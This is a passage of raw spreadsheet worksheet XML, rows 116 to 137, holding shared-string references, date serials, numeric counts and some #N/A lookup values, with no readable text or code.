      <c r="M116" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N116" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O116" s="1"/>
      <c r="P116" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q116" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R116" s="82">
        <v>3</v>
      </c>
      <c r="S116" s="82">
        <v>1</v>
      </c>
      <c r="T116" s="82">
        <v>886</v>
      </c>
      <c r="U116" s="82">
        <v>1457</v>
      </c>
      <c r="V116" s="82">
        <v>1519</v>
      </c>
      <c r="W116" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="117" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A117" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B117" s="51">
        <v>43908.853579629627</v>
      </c>
      <c r="C117" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D117" s="26">
        <v>124</v>
      </c>
      <c r="E117" s="1" t="s">
        <v>2759</v>
      </c>
      <c r="F117" s="26">
        <v>102</v>
      </c>
      <c r="G117" s="57" t="s">
        <v>2760</v>
      </c>
      <c r="H117" s="1" t="s">
        <v>2761</v>
      </c>
      <c r="I117" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J117" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K117" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L117" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M117" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N117" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O117" s="1"/>
      <c r="P117" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q117" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R117" s="82">
        <v>49</v>
      </c>
      <c r="S117" s="82">
        <v>62</v>
      </c>
      <c r="T117" s="82">
        <v>1144</v>
      </c>
      <c r="U117" s="82">
        <v>2098</v>
      </c>
      <c r="V117" s="82">
        <v>2827</v>
      </c>
      <c r="W117" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="118" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A118" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B118" s="51">
        <v>43908.853579479168</v>
      </c>
      <c r="C118" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D118" s="26">
        <v>124</v>
      </c>
      <c r="E118" s="1" t="s">
        <v>2762</v>
      </c>
      <c r="F118" s="26">
        <v>103</v>
      </c>
      <c r="G118" s="57" t="s">
        <v>2763</v>
      </c>
      <c r="H118" s="1" t="s">
        <v>2764</v>
      </c>
      <c r="I118" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J118" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K118" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L118" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M118" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N118" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O118" s="1"/>
      <c r="P118" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q118" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R118" s="82">
        <v>29</v>
      </c>
      <c r="S118" s="82">
        <v>21</v>
      </c>
      <c r="T118" s="82">
        <v>1002</v>
      </c>
      <c r="U118" s="82">
        <v>1787</v>
      </c>
      <c r="V118" s="82">
        <v>2531</v>
      </c>
      <c r="W118" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="119" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A119" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B119" s="51">
        <v>43889.707511782406</v>
      </c>
      <c r="C119" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D119" s="26">
        <v>124</v>
      </c>
      <c r="E119" s="1" t="s">
        <v>2765</v>
      </c>
      <c r="F119" s="26">
        <v>101</v>
      </c>
      <c r="G119" s="57" t="s">
        <v>2766</v>
      </c>
      <c r="H119" s="1" t="s">
        <v>2767</v>
      </c>
      <c r="I119" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J119" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K119" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L119" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M119" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N119" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O119" s="1"/>
      <c r="P119" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q119" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R119" s="82">
        <v>7</v>
      </c>
      <c r="S119" s="82">
        <v>8</v>
      </c>
      <c r="T119" s="82">
        <v>932</v>
      </c>
      <c r="U119" s="82">
        <v>1490</v>
      </c>
      <c r="V119" s="82">
        <v>2344</v>
      </c>
      <c r="W119" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="120" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A120" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B120" s="51">
        <v>43908.853579571762</v>
      </c>
      <c r="C120" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D120" s="26">
        <v>124</v>
      </c>
      <c r="E120" s="1" t="s">
        <v>2768</v>
      </c>
      <c r="F120" s="26">
        <v>102</v>
      </c>
      <c r="G120" s="57" t="s">
        <v>2769</v>
      </c>
      <c r="H120" s="1" t="s">
        <v>2770</v>
      </c>
      <c r="I120" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J120" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K120" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L120" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M120" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N120" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O120" s="1"/>
      <c r="P120" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q120" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R120" s="82">
        <v>12</v>
      </c>
      <c r="S120" s="82">
        <v>34</v>
      </c>
      <c r="T120" s="82">
        <v>917</v>
      </c>
      <c r="U120" s="82">
        <v>1633</v>
      </c>
      <c r="V120" s="82">
        <v>2474</v>
      </c>
      <c r="W120" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="121" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A121" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B121" s="51">
        <v>43889.707511875</v>
      </c>
      <c r="C121" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D121" s="26">
        <v>124</v>
      </c>
      <c r="E121" s="1" t="s">
        <v>2771</v>
      </c>
      <c r="F121" s="26">
        <v>101</v>
      </c>
      <c r="G121" s="57" t="s">
        <v>2772</v>
      </c>
      <c r="H121" s="1" t="s">
        <v>2773</v>
      </c>
      <c r="I121" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J121" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K121" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L121" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M121" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N121" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O121" s="1"/>
      <c r="P121" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q121" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R121" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S121" s="82">
        <v>4</v>
      </c>
      <c r="T121" s="82">
        <v>880</v>
      </c>
      <c r="U121" s="82">
        <v>1444</v>
      </c>
      <c r="V121" s="82">
        <v>1509</v>
      </c>
      <c r="W121" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="122" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A122" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B122" s="51">
        <v>43889.707511840279</v>
      </c>
      <c r="C122" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D122" s="26">
        <v>124</v>
      </c>
      <c r="E122" s="1" t="s">
        <v>2774</v>
      </c>
      <c r="F122" s="26">
        <v>101</v>
      </c>
      <c r="G122" s="57" t="s">
        <v>2775</v>
      </c>
      <c r="H122" s="1" t="s">
        <v>2776</v>
      </c>
      <c r="I122" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J122" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K122" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L122" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M122" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N122" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O122" s="1"/>
      <c r="P122" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q122" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R122" s="82">
        <v>43</v>
      </c>
      <c r="S122" s="82">
        <v>112</v>
      </c>
      <c r="T122" s="82">
        <v>1165</v>
      </c>
      <c r="U122" s="82">
        <v>2296</v>
      </c>
      <c r="V122" s="82">
        <v>3012</v>
      </c>
      <c r="W122" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="123" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A123" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B123" s="51">
        <v>43908.853579502313</v>
      </c>
      <c r="C123" s="1" t="s">
        <v>2744</v>
      </c>
      <c r="D123" s="26">
        <v>124</v>
      </c>
      <c r="E123" s="1" t="s">
        <v>2777</v>
      </c>
      <c r="F123" s="26">
        <v>102</v>
      </c>
      <c r="G123" s="57" t="s">
        <v>2778</v>
      </c>
      <c r="H123" s="1" t="s">
        <v>2779</v>
      </c>
      <c r="I123" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J123" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K123" s="16" t="s">
        <v>35</v>
      </c>
      <c r="L123" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M123" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N123" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O123" s="1"/>
      <c r="P123" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q123" s="1" t="s">
        <v>3659</v>
      </c>
      <c r="R123" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S123" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T123" s="82">
        <v>872</v>
      </c>
      <c r="U123" s="82">
        <v>1440</v>
      </c>
      <c r="V123" s="82">
        <v>2298</v>
      </c>
      <c r="W123" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="124" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A124" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B124" s="51">
        <v>44065.723533958335</v>
      </c>
      <c r="C124" s="1" t="s">
        <v>2780</v>
      </c>
      <c r="D124" s="26">
        <v>132</v>
      </c>
      <c r="E124" s="1" t="s">
        <v>2781</v>
      </c>
      <c r="F124" s="26">
        <v>120</v>
      </c>
      <c r="G124" s="57" t="s">
        <v>2782</v>
      </c>
      <c r="H124" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="I124" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J124" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K124" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L124" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M124" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N124" s="1"/>
      <c r="O124" s="1"/>
      <c r="P124" s="1"/>
      <c r="Q124" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="R124" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S124" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T124" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U124" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V124" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W124" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="125" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A125" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B125" s="51">
        <v>44065.723533912038</v>
      </c>
      <c r="C125" s="1" t="s">
        <v>2780</v>
      </c>
      <c r="D125" s="26">
        <v>132</v>
      </c>
      <c r="E125" s="1" t="s">
        <v>2792</v>
      </c>
      <c r="F125" s="26">
        <v>110</v>
      </c>
      <c r="G125" s="57" t="s">
        <v>2793</v>
      </c>
      <c r="H125" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="I125" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J125" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K125" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L125" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M125" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N125" s="1"/>
      <c r="O125" s="1"/>
      <c r="P125" s="1"/>
      <c r="Q125" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="R125" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S125" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T125" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U125" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V125" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W125" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="126" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A126" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B126" s="51">
        <v>44065.723533888886</v>
      </c>
      <c r="C126" s="1" t="s">
        <v>2780</v>
      </c>
      <c r="D126" s="26">
        <v>132</v>
      </c>
      <c r="E126" s="1" t="s">
        <v>2796</v>
      </c>
      <c r="F126" s="26">
        <v>110</v>
      </c>
      <c r="G126" s="57" t="s">
        <v>2797</v>
      </c>
      <c r="H126" s="1" t="s">
        <v>2798</v>
      </c>
      <c r="I126" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J126" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K126" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L126" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M126" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N126" s="1"/>
      <c r="O126" s="1"/>
      <c r="P126" s="1"/>
      <c r="Q126" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="R126" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S126" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T126" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U126" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V126" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W126" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="127" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A127" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B127" s="51">
        <v>44065.723533842596</v>
      </c>
      <c r="C127" s="1" t="s">
        <v>2780</v>
      </c>
      <c r="D127" s="26">
        <v>132</v>
      </c>
      <c r="E127" s="1" t="s">
        <v>2801</v>
      </c>
      <c r="F127" s="26">
        <v>110</v>
      </c>
      <c r="G127" s="57" t="s">
        <v>2802</v>
      </c>
      <c r="H127" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="I127" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J127" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K127" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L127" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M127" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N127" s="1"/>
      <c r="O127" s="1"/>
      <c r="P127" s="1"/>
      <c r="Q127" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="R127" s="82">
        <v>268</v>
      </c>
      <c r="S127" s="82">
        <v>513</v>
      </c>
      <c r="T127" s="82">
        <v>5470</v>
      </c>
      <c r="U127" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V127" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W127" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="128" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A128" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B128" s="51">
        <v>44065.723533865741</v>
      </c>
      <c r="C128" s="1" t="s">
        <v>2780</v>
      </c>
      <c r="D128" s="26">
        <v>132</v>
      </c>
      <c r="E128" s="1" t="s">
        <v>2805</v>
      </c>
      <c r="F128" s="26">
        <v>110</v>
      </c>
      <c r="G128" s="57" t="s">
        <v>2806</v>
      </c>
      <c r="H128" s="1" t="s">
        <v>2807</v>
      </c>
      <c r="I128" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J128" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K128" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L128" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M128" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N128" s="1"/>
      <c r="O128" s="1"/>
      <c r="P128" s="1"/>
      <c r="Q128" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="R128" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S128" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T128" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U128" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V128" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W128" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="129" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A129" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B129" s="51">
        <v>44065.723533935183</v>
      </c>
      <c r="C129" s="1" t="s">
        <v>2780</v>
      </c>
      <c r="D129" s="26">
        <v>132</v>
      </c>
      <c r="E129" s="1" t="s">
        <v>2812</v>
      </c>
      <c r="F129" s="26">
        <v>110</v>
      </c>
      <c r="G129" s="57" t="s">
        <v>2813</v>
      </c>
      <c r="H129" s="1" t="s">
        <v>2814</v>
      </c>
      <c r="I129" s="1" t="s">
        <v>17</v>
      </c>
      <c r="J129" s="1" t="s">
        <v>1412</v>
      </c>
      <c r="K129" s="1" t="s">
        <v>17</v>
      </c>
      <c r="L129" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M129" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N129" s="1"/>
      <c r="O129" s="1"/>
      <c r="P129" s="1"/>
      <c r="Q129" s="1" t="s">
        <v>3660</v>
      </c>
      <c r="R129" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S129" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T129" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U129" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V129" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W129" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="130" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A130" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B130" s="51">
        <v>43971.465269826389</v>
      </c>
      <c r="C130" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="D130" s="26">
        <v>101</v>
      </c>
      <c r="E130" s="1" t="s">
        <v>2848</v>
      </c>
      <c r="F130" s="26">
        <v>101</v>
      </c>
      <c r="G130" s="57" t="s">
        <v>2849</v>
      </c>
      <c r="H130" s="1" t="s">
        <v>2850</v>
      </c>
      <c r="I130" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J130" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K130" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L130" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M130" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N130" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O130" s="1"/>
      <c r="P130" s="1"/>
      <c r="Q130" s="1" t="s">
        <v>3656</v>
      </c>
      <c r="R130" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S130" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T130" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U130" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V130" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W130" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="131" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A131" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B131" s="51">
        <v>44082.361591076391</v>
      </c>
      <c r="C131" s="1" t="s">
        <v>2378</v>
      </c>
      <c r="D131" s="26">
        <v>100</v>
      </c>
      <c r="E131" s="1" t="s">
        <v>3069</v>
      </c>
      <c r="F131" s="26">
        <v>100</v>
      </c>
      <c r="G131" s="57" t="s">
        <v>2380</v>
      </c>
      <c r="H131" s="1" t="s">
        <v>3070</v>
      </c>
      <c r="I131" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J131" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K131" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L131" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M131" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N131" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O131" s="1"/>
      <c r="P131" s="1"/>
      <c r="Q131" s="1" t="s">
        <v>3655</v>
      </c>
      <c r="R131" s="82">
        <v>39841</v>
      </c>
      <c r="S131" s="82">
        <v>20880</v>
      </c>
      <c r="T131" s="82">
        <v>342</v>
      </c>
      <c r="U131" s="82">
        <v>594</v>
      </c>
      <c r="V131" s="82">
        <v>645</v>
      </c>
      <c r="W131" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="132" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A132" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B132" s="51">
        <v>44005.645293530091</v>
      </c>
      <c r="C132" s="1" t="s">
        <v>3097</v>
      </c>
      <c r="D132" s="26">
        <v>160</v>
      </c>
      <c r="E132" s="1" t="s">
        <v>3098</v>
      </c>
      <c r="F132" s="26">
        <v>120</v>
      </c>
      <c r="G132" s="57" t="s">
        <v>3099</v>
      </c>
      <c r="H132" s="1" t="s">
        <v>3100</v>
      </c>
      <c r="I132" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J132" s="1" t="s">
        <v>3101</v>
      </c>
      <c r="K132" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L132" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M132" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N132" s="1"/>
      <c r="O132" s="1"/>
      <c r="P132" s="1"/>
      <c r="Q132" s="1" t="s">
        <v>3661</v>
      </c>
      <c r="R132" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S132" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T132" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U132" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V132" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W132" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="133" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A133" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B133" s="51">
        <v>44155.753830081019</v>
      </c>
      <c r="C133" s="1" t="s">
        <v>3103</v>
      </c>
      <c r="D133" s="26">
        <v>102</v>
      </c>
      <c r="E133" s="1" t="s">
        <v>3104</v>
      </c>
      <c r="F133" s="26">
        <v>102</v>
      </c>
      <c r="G133" s="57" t="s">
        <v>3105</v>
      </c>
      <c r="H133" s="1" t="s">
        <v>3106</v>
      </c>
      <c r="I133" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J133" s="55" t="s">
        <v>76</v>
      </c>
      <c r="K133" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L133" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M133" s="55" t="s">
        <v>2703</v>
      </c>
      <c r="N133" s="1"/>
      <c r="O133" s="1"/>
      <c r="P133" s="1"/>
      <c r="Q133" s="1" t="s">
        <v>3107</v>
      </c>
      <c r="R133" s="82">
        <v>102826</v>
      </c>
      <c r="S133" s="82">
        <v>76379</v>
      </c>
      <c r="T133" s="82">
        <v>508791</v>
      </c>
      <c r="U133" s="82">
        <v>778265</v>
      </c>
      <c r="V133" s="82">
        <v>910223</v>
      </c>
      <c r="W133" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="134" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A134" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B134" s="51">
        <v>43746.727824120368</v>
      </c>
      <c r="C134" s="1" t="s">
        <v>3108</v>
      </c>
      <c r="D134" s="26">
        <v>121</v>
      </c>
      <c r="E134" s="1" t="s">
        <v>3109</v>
      </c>
      <c r="F134" s="26">
        <v>100</v>
      </c>
      <c r="G134" s="57" t="s">
        <v>3110</v>
      </c>
      <c r="H134" s="1" t="s">
        <v>3111</v>
      </c>
      <c r="I134" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J134" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K134" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L134" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M134" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N134" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O134" s="1" t="s">
        <v>2122</v>
      </c>
      <c r="P134" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q134" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="R134" s="82">
        <v>54</v>
      </c>
      <c r="S134" s="82">
        <v>8</v>
      </c>
      <c r="T134" s="82">
        <v>296</v>
      </c>
      <c r="U134" s="82">
        <v>5470</v>
      </c>
      <c r="V134" s="82">
        <v>8549</v>
      </c>
      <c r="W134" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="135" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A135" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B135" s="51">
        <v>44021.135121504631</v>
      </c>
      <c r="C135" s="1" t="s">
        <v>3108</v>
      </c>
      <c r="D135" s="26">
        <v>121</v>
      </c>
      <c r="E135" s="1" t="s">
        <v>3113</v>
      </c>
      <c r="F135" s="26">
        <v>104</v>
      </c>
      <c r="G135" s="57" t="s">
        <v>3114</v>
      </c>
      <c r="H135" s="1" t="s">
        <v>3115</v>
      </c>
      <c r="I135" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J135" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K135" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L135" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M135" s="35" t="s">
        <v>236</v>
      </c>
      <c r="N135" s="1"/>
      <c r="O135" s="1" t="s">
        <v>3116</v>
      </c>
      <c r="P135" s="1" t="s">
        <v>909</v>
      </c>
      <c r="Q135" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="R135" s="82">
        <v>193196</v>
      </c>
      <c r="S135" s="82">
        <v>135705</v>
      </c>
      <c r="T135" s="82">
        <v>875656</v>
      </c>
      <c r="U135" s="82">
        <v>1629054</v>
      </c>
      <c r="V135" s="82">
        <v>1694366</v>
      </c>
      <c r="W135" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="136" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A136" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B136" s="51">
        <v>43777.616899745371</v>
      </c>
      <c r="C136" s="1" t="s">
        <v>3117</v>
      </c>
      <c r="D136" s="26">
        <v>100</v>
      </c>
      <c r="E136" s="1" t="s">
        <v>3118</v>
      </c>
      <c r="F136" s="26">
        <v>100</v>
      </c>
      <c r="G136" s="57" t="s">
        <v>3119</v>
      </c>
      <c r="H136" s="1" t="s">
        <v>3120</v>
      </c>
      <c r="I136" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J136" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K136" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L136" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M136" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N136" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O136" s="1" t="s">
        <v>3121</v>
      </c>
      <c r="P136" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q136" s="1" t="s">
        <v>3663</v>
      </c>
      <c r="R136" s="82">
        <v>5057</v>
      </c>
      <c r="S136" s="82">
        <v>6090</v>
      </c>
      <c r="T136" s="82">
        <v>50755</v>
      </c>
      <c r="U136" s="82">
        <v>102055</v>
      </c>
      <c r="V136" s="82">
        <v>135621</v>
      </c>
      <c r="W136" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="137" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A137" s="1" t="s">
        <v>3</v>
      </c>
